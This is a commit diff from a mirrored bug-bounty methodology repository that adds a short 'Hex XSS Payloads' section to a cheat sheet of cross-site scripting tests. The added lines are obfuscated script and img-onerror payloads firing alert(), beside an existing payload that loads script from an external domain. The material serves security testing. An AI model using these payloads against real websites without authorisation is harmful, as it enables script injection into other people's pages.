mirror of
https://github.com/xalgord/My-Methodologies.git
synced 2024-11-10 06:04:20 +00:00
GITBOOK-50: change request with no subject merged in GitBook
This commit is contained in:
parent
dff4f549c7
commit
692f151b2b
1 changed files with 8 additions and 0 deletions
|
@ -351,6 +351,14 @@ GET /?q=xss POST /q=xss
|
|||
<script/src=//NJ.₨></script>
|
||||
```
|
||||
|
||||
### Hex XSS Payloads:
|
||||
|
||||
```
|
||||
</title><scRipt>alert(0x00C57D)</scRipt>
|
||||
<iMg src%3dN onerror%3dalert(0x0036A9)>
|
||||
<iMg src%3dN onerror%3dalert(0x000D98)>
|
||||
```
|
||||
|
||||
### Some awesome people on twitter
|
||||
|
||||
* [@Dark\_Knight](https://twitter.com/\_Dark\_Knight\_)
|
||||
|
|
Loading…
Reference in a new issue